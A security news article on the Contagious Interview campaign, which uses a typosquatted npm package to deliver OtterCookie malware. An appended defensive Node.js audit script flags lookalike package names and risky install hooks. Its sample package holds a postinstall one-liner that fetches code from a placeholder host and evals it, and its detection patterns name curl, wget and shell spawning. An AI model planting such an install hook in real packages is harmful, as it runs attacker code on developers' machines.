Contagious Interview attackers go ‘full stack’ to fool developers


Coding tasks lead to malware delivery

These defensive measures are effective because Contagious Interview's entry vector relies heavily on social engineering: fake interview tasks trick developers into installing compromised dependencies.

The campaign exploits NPM, the widely used package registry for JavaScript and Node.js, by publishing packages that appear benign but carry hidden payloads. The malicious packages, including one named "tailwind-magic", mimic legitimate libraries (in this case a typosquatted version of the genuine "tailwind-merge" utility) to avoid suspicion.

When an unsuspecting developer installs such a package, a post-install script triggers and reaches out to a staging endpoint hosted on Vercel. That endpoint in turn delivers a live payload fetched from a threat-actor-controlled GitHub account named "stardev0914". The payload, a variant of OtterCookie that also folds in capabilities from the campaign's other signature payload, BeaverTail, executes and establishes a remote connection to the attackers' control server. The malware then silently harvests credentials, crypto-wallet data, browser profiles and more.

"Tracing the malicious npm package tailwind-magic led us to a Vercel-hosted staging endpoint, tetrismic[.]vercel[.]app, and from there to the threat actor controlled GitHub account which contained 18 repositories," Socket's senior threat intelligence analyst Kirill Boychenko said in a blog post, crediting related research by Kieran Miyamoto that helped confirm the malicious GitHub account stardev0914.

A 'full stack' adversary: GitHub, Vercel, and NPM

What makes this campaign stand out is the layered infrastructure behind it. Socket's analysis traced not just the NPM packages but also how the attackers built a complete delivery pipeline: malware-serving repositories on GitHub, staging servers on Vercel, and separate C2 servers for exfiltration and remote command execution. Through this setup, attackers can "rotate payloads, update malware unobtrusively, and tailor deployments per target", all while blending deeply into the legitimate developer ecosystem, according to Boychenko.

Once installed, OtterCookie doesn't just run and vanish: it remains persistent, capable of logging keystrokes, hijacking the clipboard, scanning the filesystem, capturing screenshots, and grabbing browser and wallet credentials across Windows, macOS and Linux.

The campaign actors' intensified NPM activity arrives at a worrying moment for the JavaScript and open-source ecosystem. In recent months the community has seen a flurry of NPM-based attacks, including worm-style campaigns that transformed popular packages into Trojan horses, automated credential theft, and widespread supply chain compromise across both development and CI environments.

This article was first published on InfoWorld.
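The two signals the article describes, a package name that trades on a well-known one and an install-time lifecycle script that pulls code from a remote endpoint, are exactly what a pre-install check can look for. The following is an added example written for this page, not code from the article, from Socket or from any real package: a small Node.js audit over a parsed package.json. The known-package allowlist, the risky-command patterns and both sample packages are constructed for illustration; in particular the postinstall command attributed to "tailwind-magic" below is invented and points at a reserved .invalid domain, not the staging endpoint Socket reported.

```javascript
"use strict";
// Added example, not code from the article or from Socket's research.
// A pre-install audit for the two signals described above: a package name that
// resembles a well-known one, and an install-time lifecycle script that reaches
// out to the network. All package data below is constructed for illustration.

// npm runs these hooks automatically during `npm install`.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Behaviour that an ordinary library has no reason to put in an install hook.
const RISKY_PATTERNS = [
  { re: /https?:\/\/[^\s"']+/i, why: "fetches a remote URL at install time" },
  { re: /\b(curl|wget)\b/i, why: "shells out to a downloader" },
  { re: /\bnode\s+-e\b/i, why: "evaluates inline JavaScript" },
  { re: /\beval\s*\(/i, why: "calls eval()" },
  { re: /base64|atob\(/i, why: "decodes an encoded blob" },
  { re: /\b(sh|bash)\s+-c\b/i, why: "spawns a shell" },
];

// Packages a typosquat would try to resemble. A short hypothetical allowlist;
// in practice this would be built from the project's own lockfile.
const KNOWN_PACKAGES = ["tailwind-merge", "tailwindcss", "lodash", "express", "axios"];

// Levenshtein edit distance with a single rolling row.
function editDistance(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0];
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j];
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      row[j] = Math.min(above + 1, row[j - 1] + 1, diag + cost);
      diag = above;
    }
  }
  return row[b.length];
}

// Returns the well-known package that `name` imitates, or null.
function lookalikeOf(name) {
  if (KNOWN_PACKAGES.includes(name)) return null; // the genuine article
  const prefix = name.split("-")[0];
  for (const known of KNOWN_PACKAGES) {
    // Near-miss spelling, e.g. "lodahs" for "lodash".
    if (editDistance(name, known) <= 2) return known;
    // Same hyphenated brand prefix with a swapped suffix, which is how
    // "tailwind-magic" trades on "tailwind-merge" despite a large edit distance.
    if (name.includes("-") && known.includes("-") && known.split("-")[0] === prefix) return known;
  }
  return null;
}

// Returns one finding per risky pattern found in an install-time hook.
function riskyHooks(scripts = {}) {
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    for (const { re, why } of RISKY_PATTERNS) {
      if (re.test(cmd)) findings.push({ hook, why, match: cmd.match(re)[0] });
    }
  }
  return findings;
}

// Audit a parsed package.json object.
function auditPackage(pkg) {
  const lookalike = lookalikeOf(pkg.name);
  const hookFindings = riskyHooks(pkg.scripts);
  return { name: pkg.name, lookalike, hookFindings, suspicious: lookalike !== null || hookFindings.length > 0 };
}

// Constructed lookalike of the package described in the article. The name is
// the one Socket reported; the postinstall command is invented for the example
// and points at a reserved .invalid domain, not the real staging endpoint.
const SAMPLE_PACKAGE = {
  name: "tailwind-magic",
  version: "1.0.3",
  scripts: {
    postinstall: "node -e \"require('https').get('https://staging.example.invalid/p',r=>{let d='';r.on('data',c=>d+=c);r.on('end',()=>eval(d))})\"",
    test: "jest",
  },
};

// Constructed benign package: a genuine name and a local postinstall step.
const BENIGN_PACKAGE = {
  name: "tailwind-merge",
  version: "2.0.0",
  scripts: { build: "tsc", postinstall: "node scripts/warn-peer-deps.js" },
};

for (const pkg of [SAMPLE_PACKAGE, BENIGN_PACKAGE]) {
  console.log(JSON.stringify(auditPackage(pkg), null, 2));
}
```

Two design points. Plain edit distance alone would miss tailwind-magic, since "magic" and "merge" differ in four positions, so the name check also flags a shared hyphenated prefix with a swapped suffix; expect that rule to produce false positives on legitimate plugin families and review its hits rather than block on them. And the pattern check is a heuristic on the script text only: the blunt control that actually prevents a post-install hook from running at all is `npm install --ignore-scripts` (or `npm config set ignore-scripts true`), at the cost of breaking the minority of packages that legitimately build native code on install.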

First seen on csoonline.com

Jump to article: www.csoonline.com/article/4098699/contagious-interview-attackers-go-full-stack-to-fool-developers.html

